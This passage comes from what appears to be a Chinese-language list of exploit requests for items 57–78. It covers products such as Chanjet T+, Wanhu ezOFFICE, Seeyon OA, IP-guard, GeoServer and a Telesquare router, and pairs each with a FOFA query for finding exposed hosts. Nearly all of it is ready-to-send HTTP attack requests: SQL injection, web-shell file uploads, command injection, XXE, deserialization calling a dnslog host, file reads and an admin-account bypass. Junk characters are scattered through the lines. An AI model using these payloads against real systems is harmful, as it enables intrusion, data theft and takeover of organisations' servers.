6 i+ Q8 f6 p4 x; L" U2 d* ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
- C/ r8 a% J2 ~; U% aContent-Type: application/json
' h# g& G. J Y5 `$ i6 n$ n" e" Y+ Z* P) u1 g7 _
{
3 _9 O. `1 h# Z& k0 U "storeID":{# c/ Q# B/ x" u( G0 `0 E+ T5 f" ]
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
* F2 }# n e! s+ h( X "MethodName":"Start",
$ V- V" L! q0 Z: Q0 d- @- I "ObjectInstance":{( J: w$ |! j) \$ R4 ~( M# F
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",3 p4 v& T" z7 W" Z
"StartInfo": {
& [ Q$ ^$ Q- G9 c+ N "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
" Y- G6 S) Y" J W) W "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw". m* y1 k( W; W
}
9 M, h0 i8 c7 E' u; j1 Z }
* v" I |) ^: O( p* r& f }! z* t" b+ z0 |
}
: h2 H- {7 G4 I4 z+ W
" i0 c, q0 U& P' a9 @- K3 \+ _! ~% V- R0 W( L4 N9 ^. @/ \
57. 畅捷通T+ keyEdit.aspx SQL注入
( ?$ r9 q. Q& b- h0 f# t: pFOFA:app="畅捷通-TPlus"
; |& j }+ n e9 {6 [, D4 z$ L% G; W& RGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1/ K; H; r) f8 m; b3 e9 y( r. c
Host: host4 J* L; I. H- ?
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36- t$ Y2 g! ^& |
Accept-Charset: utf-85 [7 ?+ @ e( ]& ]1 B* L2 w: j
Accept-Encoding: gzip, deflate
) M/ ]$ @; _0 vConnection: close/ x; h0 k4 Z. e* L8 a3 q+ z- v
! l& {& a6 s1 i
5 N# G9 V: R: b4 Y' Q58. 畅捷通T+ KeyInfoList.aspx sql注入
* m4 ~3 f% \2 E+ I# X; m+ hFOFA:app="畅捷通-TPlus"; W( d; T- D: v: ]: [# g
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.13 U7 j6 T3 ]' i8 Q; B2 W1 p
Host: your-ip8 A0 K: {9 g8 u, X6 P
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36 }/ x0 p$ }) h- L- \
Accept-Charset: utf-8
3 d$ d! Y- K: UAccept-Encoding: gzip, deflate; l3 Z+ M+ G% U& S2 ]: Z5 b
Connection: close2 {- I: E+ m& J( u$ c, J
$ q0 I, w% d' x% _6 m3 F: B" P
: _/ c' E# }4 }59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
2 r) z! E# B9 _& ?. M, ~* GFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"* O9 H% @, r, S0 g( d
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1' R) f8 H' e* Q
Host: 192.168.86.128:90904 a! h! D0 k" E" \# T# h
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
" W5 m' f0 F# a1 gConnection: close
: d! J, D/ r: ^5 BContent-Length: 1669' D: Q1 { j# l7 O6 M; M2 z
Accept: */*% v* `" K- F3 b [
Accept-Language: en
+ g, n6 `* I& yContent-Type: application/x-www-form-urlencoded
1 C# P" {. O# }$ x8 WAccept-Encoding: gzip
5 G% q0 q! J0 ^' _4 }
- o+ l: s$ T HPAYLOAD m; [( B% S( V
8 e5 H |1 ?- w, t9 o% Y
s$ k! A, M) J: R& B60. 百卓Smart管理平台 importexport.php SQL注入+ X# I/ v3 C8 b& V* M/ S! D1 e& X
FOFA:title="Smart管理平台"
; f+ z3 k j2 W* o, UGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1- L. F @7 M% E# T+ Q7 ~" a7 ^
Host:, L/ Z% w( k. q4 U7 ?2 R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
4 }- S6 _7 X0 ^9 I$ ^$ k' _6 v/ \. \; OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 A0 h. i# W/ v3 |$ r
Accept-Encoding: gzip, deflate5 e+ p5 ]1 q" U. P, r2 [$ J9 c
Accept-Language: zh-CN,zh;q=0.92 B2 f0 m' Z5 `/ ?
Connection: close
d; J& `8 w/ F) k8 a2 r1 h: E
; V. E/ Z( J1 E( d
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
& Q$ J+ q6 d- PFOFA: title="欢迎使用浙大恩特客户资源管理系统"9 a Q( J; d+ ?( K7 E7 q* m' }% y
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.12 t, B* Z7 X/ M- ^$ G6 x
Host: x.x.x.x
& ?. Q Z) I& ?! z1 T( ~% GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15. p: J1 C$ m* Q7 H9 j
Connection: close
! Z6 p5 x; q. D) JContent-Length: 27
, t0 X& |3 O k! P+ Z' mAccept: */*
; s9 {- c( X" ~0 tAccept-Encoding: gzip, deflate# p- b- P I2 W% I) Y$ Y" W
Accept-Language: en9 F; w7 a9 L# q( X+ f* f5 q
Content-Type: application/x-www-form-urlencoded
# D) z& z2 \4 t' b
% T5 q- i9 A, o0 M8 F8uxssX66eqrqtKObcVa0kid98xa
8 N/ d9 ?6 b# C6 [1 S8 \& i( J& _. P, |8 U; ~0 l& I
( I$ x6 ?5 C: b& F62. IP-guard WebServer 远程命令执行5 a$ V; g4 p- O$ q) T5 j1 i
FOFA:"IP-guard" && icon_hash="2030860561"
" G) e& d J# q$ J7 jGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
, o5 R7 g @7 h& }Host: x.x.x.x
( R( Y3 |' }( T% A1 I) Q/ c- |User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
/ P `' @* e- s3 `Connection: close
- w+ j! G/ m+ j- y1 rAccept: */*
- H, @6 |+ M3 A" MAccept-Language: en
% ~) h& J( `: a! |Accept-Encoding: gzip
( d" J K% [- X' ]7 s4 [2 R% X1 m3 ^9 J* R7 \
# q4 w7 o6 Y6 d! f: u; X$ M) N F# d访问
, p+ e3 s) c4 U4 A- S1 o% r& x
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
! W6 \9 t! ^+ G$ S3 \6 mHost: x.x.x.x
9 V% z9 C& R& Q1 V+ G
) ^" ]: L5 V" c/ B5 `& h
2 L; p" C, p: J63. IP-guard WebServer任意文件读取7 j; e( y' B$ j2 k% d7 _8 Q) G
IP-guard < 4.82.0609.0
1 i( l: h0 s: G$ J$ X. PFOFA:icon_hash="2030860561"
3 g0 S# J1 N7 M1 u8 c3 {1 C4 mPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
. V+ b/ |4 A9 S9 k" u& a/ mHost: your-ip
. }3 j/ x) q- h+ ?# y) z% y1 |8 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36: t8 M6 Y. g8 ~7 i" L' v) ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ z* Q! x. I5 I8 X+ f
Accept-Encoding: gzip, deflate- S9 n4 P8 b- C# H
Accept-Language: zh-CN,zh;q=0.9
3 a0 j7 W* i. F" R" AConnection: close y6 ]" m9 ~- e3 Y7 y- [
Content-Type: application/x-www-form-urlencoded
" {0 v" x# t6 i2 C1 y& E7 f+ o2 y! k% D3 ?% r( U/ G
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A, E: c- Q8 t2 M% J; l' T; H7 X
( L5 f8 I3 a5 i% q- H. y
64. 捷诚管理信息系统CWSFinanceCommon SQL注入1 g8 h" z) ]# t1 u+ w% Q
FOFA:body="/Scripts/EnjoyMsg.js"
, ]. s% e" {; t. v, ?4 B# \POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
8 U3 a) R$ [* l& O, W: U! LHost: 192.168.86.128:9001, f7 u2 b0 `, f! G1 Q9 Q( r4 z9 M
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
b, o$ M0 y0 k# F M6 {% IConnection: close
3 r( E. ?, u- |6 AContent-Length: 369
3 b# x( p$ d% L, o/ d, NAccept: */*
+ f. b. I: Q5 D4 \9 S; i; N0 |Accept-Language: en
9 U, Y) b$ t. lContent-Type: text/xml; charset=utf-8' M' S- U/ D5 d
Accept-Encoding: gzip
& w5 |. g' v; G! | B$ o& ^/ B, T, G0 X+ S2 o; _# Y: E9 E
<?xml version="1.0" encoding="utf-8"?>
6 V- o, F* A+ E0 }<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
" ?% a m) W! R* J( m( I; f: P<soap:Body>; v" k- y( n. @& t z
<GetOSpById xmlns="http://tempuri.org/">! x& I5 ?/ M' C- s
<sId>1';waitfor delay '0:0:5'--+</sId>" e$ o6 R" J, o
</GetOSpById>; w; @, q) B2 _2 s
</soap:Body>
6 ], H0 h7 V! s D</soap:Envelope>1 \: f& v/ S- j2 S" j
# D: W, U$ p. [6 ^
2 Q& j C! W# P# f0 ?6 [65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
& w+ U9 U' i I4 ?% b$ s6 xFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
) K7 Z+ \' e6 ~3 r响应200即成功创建账号test123456/1234560 e# f% M, ?+ k+ o: { X2 W2 ^
POST /SystemMng.ashx HTTP/1.1
* A/ d* p: D9 xHost: h: B9 Y" d3 @4 t
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
2 c/ |2 C' Y/ H9 m# y6 T' \Accept-Encoding: gzip, deflate
7 A0 [: B @. G3 {4 yAccept: */*
, E5 h, j7 Z+ D6 z0 @4 sConnection: close n- l7 |. w) L! v2 y9 A- N
Accept-Language: en' v3 ^/ B" ~$ b' @: Z
Content-Length: 174
3 O2 J' {' @; q+ X0 z( o/ p- A" {. e' r
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators* N% z/ T9 i6 k2 b
3 y( }$ n S4 n7 Q5 b1 R
. d; S# s0 y! S2 d! }7 ]
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入* F) E, M* j! U* l1 j6 A3 ?" v
FOFA:app="万户ezOFFICE协同管理平台"
: Z( a3 Y) z( M* q# ? K8 w
# V/ o5 K7 C8 h. s3 LGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1* E- `/ m3 V% j4 I' \" b7 s# S
Host: x.x.x.x
4 }1 d# ]: T/ V: v( M6 g& uUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
5 Q' N( U+ J, A$ e+ }# EConnection: close" C% p/ o) V3 `$ v8 D- G; |1 r
Accept: */*. h; E2 Y) N9 b6 B7 n
Accept-Language: en! D1 q) u1 _6 } j
Accept-Encoding: gzip
9 q& Q3 n! D) Y7 m& U
# P( R5 Y1 X4 ~; Z3 |" L1 K
, H- I% ~# t! O; y第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
3 J/ ~: H* p/ Q3 ^/ @. i, s
1 ?% r2 n% S# H1 \& g! p7 V67. 万户ezOFFICE wpsservlet任意文件上传
" H! o. o- |* V( `# S2 wFOFA:app="万户网络-ezOFFICE"
1 u L2 }6 K" p8 m- [ K3 M& r+ AnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型9 d) ]- G2 x, e' m
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
: H) a( f6 L) x! _: qHost: x.x.x.x% |- N" _$ s1 x6 J8 y4 W7 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0, M- m0 M( {7 q* ]- [7 Y I
Content-Length: 173
' F9 v7 ~9 Q0 p# ?5 @5 L! J/ j; @/ VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' E. o6 J5 X( }
Accept-Encoding: gzip, deflate2 X. R" i. q" J! _, T0 g
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
: K) v1 s$ q3 M6 PConnection: close
8 v2 C4 h1 T+ v$ [3 H9 sContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp( Z9 Q: U0 P7 [3 z" |
DNT: 1# b9 ]: t n# H) j) S* ?- A3 x# U
Upgrade-Insecure-Requests: 1
, A# L$ n1 i# j3 J( |/ Q- [; I8 s/ k* H$ ]5 G
--ufuadpxathqvxfqnuyuqaozvseiueerp
. \3 I/ c! E( i/ Z: QContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
; e+ u- }3 a) I* F$ s" O# E" |& ?4 R( u- g
<% out.print("sasdfghjkj");%>
, `3 p% r2 p* |/ e- |+ v/ N--ufuadpxathqvxfqnuyuqaozvseiueerp--
6 p9 s z2 O7 K) y% N* l: }; @
# C- M; {' x$ h% @' D6 U1 B; L$ i5 I: q9 W J: _
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp- k9 \9 C: c0 L; z+ `, W5 P
2 C! M& |: ]: D# _/ G5 E6 [/ b4 `
68. 万户ezOFFICE wf_printnum.jsp SQL注入
j( H/ A! E; g0 c) N% {1 [FOFA:app="万户ezOFFICE协同管理平台"% G5 [/ {8 J9 h
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1 T3 ^/ a4 O9 f( g1 U
Host: {{host}}
" e2 _4 m+ u: g7 I, B% n1 Z cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.360 `' z* f" ?( \8 X9 c) u7 P
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
; g& x4 G% M3 p8 R, Y2 nAccept-Encoding: gzip, deflate
4 w3 H6 ?: b/ p: mAccept-Language: zh-CN,zh;q=0.9' C# g) M" |( e
Connection: close( |2 P4 i+ j8 [/ L: [& Y
1 l. ?0 Y4 ^6 R' C$ T0 T/ X0 d$ g
/ i- Z" d* J, N. G4 \& e% B: b% `69. 万户 ezOFFICE contract_gd.jsp SQL注入
4 X& g1 g4 Q! u5 m" g) p9 FFOFA:app="万户ezOFFICE协同管理平台" e& i. y6 a" j+ O
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
3 V; M7 A& u) G1 hHost: your-ip
7 X j. G" w- c* A9 K+ pUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
1 W4 Y! H0 ]" T% R0 a. x' XAccept-Encoding: gzip, deflate
# y( X! [) J* n& c1 d, zAccept: */*2 O1 y' N0 ~* U$ @9 \% D. c
Connection: keep-alive
# u6 s3 Z6 X6 y6 z& B% f! p# o$ A" s0 u- q7 ~! s7 P
" C% l5 [( d5 f& v# L9 I: y
70. 万户ezEIP success 命令执行" N% q, ]5 W( G9 J
FOFA:app="万户网络-ezEIP"# F2 k" C3 o$ N2 N, Y! N
POST /member/success.aspx HTTP/1.1) n1 v4 m- b. z8 z
Host: {{Hostname}}
3 C. X3 |/ _4 w. V& iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36. e- ^4 X1 v: o8 n1 m+ z: |
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=; Q k7 q+ O7 N( `6 F
Content-Type: application/x-www-form-urlencoded
0 h6 S& ~# g7 eTYPE: C" L4 m9 R' ^" R) w q- x ]% J
Content-Length: 16702
! a. j/ v4 x" k" q, T \. ^$ q: F1 ]7 f$ [) O2 o" _
__VIEWSTATE=PAYLOAD
6 t+ ?% |6 d; K0 \5 m! ^3 f. }$ {0 w2 X5 Z6 C9 a6 P9 c7 K% D- y
( o) t B) m2 G# j9 Z" @
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入) J6 }( O* n! z
FOFA:body="PM2项目管理系统BS版增强工具.zip"# E; k. D4 b9 C: J" i0 _
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
. N' B" C7 r* K& u, D% Z3 A6 BHost: x.x.x.xx.x.x.x
0 ]( s" Z$ I: k ]5 bUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
( k, k9 X$ F2 \Connection: close
4 T; `# V* \$ Z8 }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 Y* _3 ^# h* n& V6 o5 N
Accept-Encoding: gzip, deflate
- o# T1 r" z% w( E% s5 _0 y! C" ~Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, q' d6 T1 L1 }6 Y% ?* \ iUpgrade-Insecure-Requests: 10 {8 _) i+ o& ?$ h& Q! d" u
: |# z3 Y5 c+ S0 ]) ^3 ~6 N5 k
: p0 g& K6 Z: P2 x9 d* }
72. 致远OA getAjaxDataServlet XXE
7 f2 W# b" A; z' n+ E- cFOFA:app="致远互联-OA"5 P, e" y/ B2 X6 P" Z
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
) U; ]: L% z4 Q* o, EHost: 192.168.40.131:8099/ @, v/ o; m; M t
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
/ t; e0 J2 i3 [ RConnection: close
1 r6 \ }# j: Z7 p& e# lContent-Length: 583. Q7 R2 u9 ]: S
Content-Type: application/x-www-form-urlencoded
+ V, i# Q# k9 y, k7 Y; s6 ?- HAccept-Encoding: gzip. }7 G' @$ R8 R3 R
( }/ P7 Q0 [6 b7 s
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
9 R9 g3 N/ ^1 f- R2 n9 J' h* x- T
T2 ?+ ?* O5 }1 W$ I6 ^( p, a
! n7 h6 N/ @1 @$ {, p/ `, T73. GeoServer wms远程代码执行
( j( M0 v& j* v# c, F1 sFOFA:icon_hash=”97540678”
* x$ _4 @7 E( p5 xPOST /geoserver/wms HTTP/1.1# F Q3 Y: i' d5 w% u6 f5 P) _
Host:
+ Q$ z- ]& n8 q0 O* y, g# E. _: k* pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
4 Y( ?2 z7 e1 F- Y3 {1 O! H% lContent-Length: 19819 O. q4 ~6 C% C2 q8 _% _
Accept-Encoding: gzip, deflate4 y8 A% _( ~: s0 }
Connection: close
/ Q+ S/ u2 E0 k5 p' @Content-Type: application/xml% T/ C/ \3 D0 b2 b) B
SL-CE-SUID: 3
, M- E) \7 y. u! s- A# L
' m2 t5 Z( s0 s$ s# T' oPAYLOAD
3 k) q; k1 J3 d9 U; h; E* u' h3 L4 N) T/ y, d0 o
9 S( @2 o0 d# Y; t2 X9 ^, J74. 致远M3-server 6_1sp1 反序列化RCE/ t: V, h9 n' g/ O5 }, o% v
FOFA:title="M3-Server"
& }( c8 x' e) ^$ H# d% qPAYLOAD4 T$ P$ z$ Q" F8 S4 R" z5 I8 y
; U4 J; w* c+ z5 Z- s75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE4 E& x( ?- g, W& A
FOFA:app="TELESQUARE-TLR-2005KSH"5 g7 Y- y/ h# {8 F \' Q
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
5 J( Z8 m% x, n) z0 F) N3 x; eHost: x.x.x.x
9 W$ ^9 D: j) n2 O3 U; I$ v) P# wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 J% e' I- X. g. f9 XConnection: close# K2 J, x6 w5 B
Accept: */*8 ] C* x" @6 z
Accept-Language: en
8 s3 v8 E% l1 [Accept-Encoding: gzip
C0 I+ l8 P/ {5 y0 ?( S' |0 L
0 X: r5 L( o7 _
- A& q3 j9 x, ~GET /cgi-bin/test28256.txt HTTP/1.1
6 D# n8 X' G7 E! H$ K* wHost: x.x.x.x/ F6 X0 }5 b3 t
3 H) V! ]& B; W" ?9 L2 [ ?
5 u) W2 P4 L. G+ o# S: e) ^76. 新开普掌上校园服务管理平台service.action远程命令执行
* K9 \: n6 a6 D) J7 nFOFA:title="掌上校园服务管理平台"
% u5 J1 J/ q: z! J+ s6 |9 y6 F7 aPOST /service_transport/service.action HTTP/1.1
, ]$ c9 E' f3 _" iHost: x.x.x.x
: r/ g1 }& K9 d- dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.09 T/ s) O7 }+ H, Z9 F
Connection: close% _3 F, [: L6 l% n: W* P
Content-Length: 211" D) I+ |7 B* T9 x& n6 o7 W) i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) ^& A% J X: D$ RAccept-Encoding: gzip, deflate
# T' L% U4 l6 g+ o* e. p" lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 @7 a" W4 M- T* L6 l' J
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4' c; }: q$ y# x1 l) J. v6 X% o0 }& D
Upgrade-Insecure-Requests: 1
+ K) D( [1 e# K
0 ]; I3 u/ ^; v$ e{
: o) v0 ]8 B: m"command": "GetFZinfo",6 ]0 |/ C. J) @( C
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
# ~8 O9 T% ?8 r0 X ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
# p% n/ U; K. i# I9 X}6 i# P- S; e+ u5 l; {* {( k
( y9 S: l' y/ ~! e, L2 q
+ L5 e i; I+ i/ E8 EGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1. s& _6 {4 D0 R6 w
Host: x.x.x.x
3 Y; d2 u n: L5 z' H* k" ~0 U( m2 {7 L% v; d, n1 w
6 M5 R+ y7 ^( c U" o+ I
8 ^% h" t$ j4 X
77. F22服装管理软件系统UploadHandler.ashx任意文件上传" f5 k. }+ U% l
FOFA:body="F22WEB登陆"
2 b& B5 j$ J- _+ X, A' m* @4 TPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1& b& M& Y9 Q, e4 a$ f2 ]+ a4 T6 U
Host: x.x.x.x3 X! `$ I; x2 b+ i9 u s- J2 G( m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
, y0 g4 ^/ {6 D( _7 fConnection: close
9 H0 a2 r t8 U! U: d6 u9 M( tContent-Length: 4337 F2 d2 l9 E7 K1 ^
Accept: */*% p5 y6 c- b8 z/ m
Accept-Encoding: gzip, deflate
3 ]' S8 O* I$ F: z3 iAccept-Language: zh-CN,zh;q=0.9
1 U. W. @' i! \: O5 E" DContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix$ p" N5 X9 n1 O" O2 U0 X2 p
4 G8 J# q& D- T) t3 T4 I
------------398jnjVTTlDVXHlE7yYnfwBoix
! d- ~ o2 c; Z' UContent-Disposition: form-data; name="folder"
$ J3 d7 e( d3 L+ {1 L s, v; p0 N7 ~1 U2 ^+ {8 @% L
/upload/udplog; F* p0 c G) V% D) ?$ e+ H" z, H
------------398jnjVTTlDVXHlE7yYnfwBoix z! g" g* I7 O$ U @8 K8 g
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"1 \4 {* h* d, E! W6 B: n7 a$ U9 O2 ?
Content-Type: application/octet-stream1 J* [5 h4 }5 H
- B9 t2 j3 z6 |hello1234567* T# L! @8 z3 J4 `
------------398jnjVTTlDVXHlE7yYnfwBoix
' k8 ]. L0 E4 P) x5 ] \Content-Disposition: form-data; name="Upload"
+ x3 c- N* T# z2 d1 n, F4 S& j( v3 q. {3 L3 R, D D& x
Submit Query4 L- x" N4 O% m- L
------------398jnjVTTlDVXHlE7yYnfwBoix--) B% E9 O% o8 M
* j( @2 ]' }$ d5 }3 O- z
. h0 n. ]: G t, l$ O
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
+ ^5 Z; G1 Y: N4 |' ?9 }FOFA:icon_hash="2001627082"
`- M- M$ Y% b; FPOST /Platform/System/FileUpload.ashx HTTP/1.1
w4 R, `, q# z0 l6 Q3 _" uHost: x.x.x.x
/ C. c9 y, O+ s* aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: T5 ]- d6 m8 }# i- Y3 Y2 l
Connection: close
/ E8 [# e/ ^, J$ S/ g( M6 ~Content-Length: 336
y3 R& B: x5 a0 V7 n3 CAccept-Encoding: gzip
& Y; g& J; d, sContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
/ e0 }: m- @" U i
5 `5 s* c* w4 j------YsOxWxSvj1KyZow1PTsh98fdu6l
: A$ d7 j+ c: H0 n9 BContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"6 V! X& ~/ I5 b: z: x) j
Content-Type: image/png
$ m- @' j9 v/ H* U4 j/ d: W& W$ D1 o" |* H
YsOxWxSvj1KyZow1PTsh98fdu6l
|* S& b0 n2 L; ^% T------YsOxWxSvj1KyZow1PTsh98fdu6l [! e- ` j7 v+ d9 X) p F Q8 f
Content-Disposition: form-data; name="target"" V6 u; o* W, ?, E
6 E( {* e u, i; @% V8 u( ^/Applications/SkillDevelopAndEHS/- ~& Z( h6 O e# h& p, \8 {7 Z% f
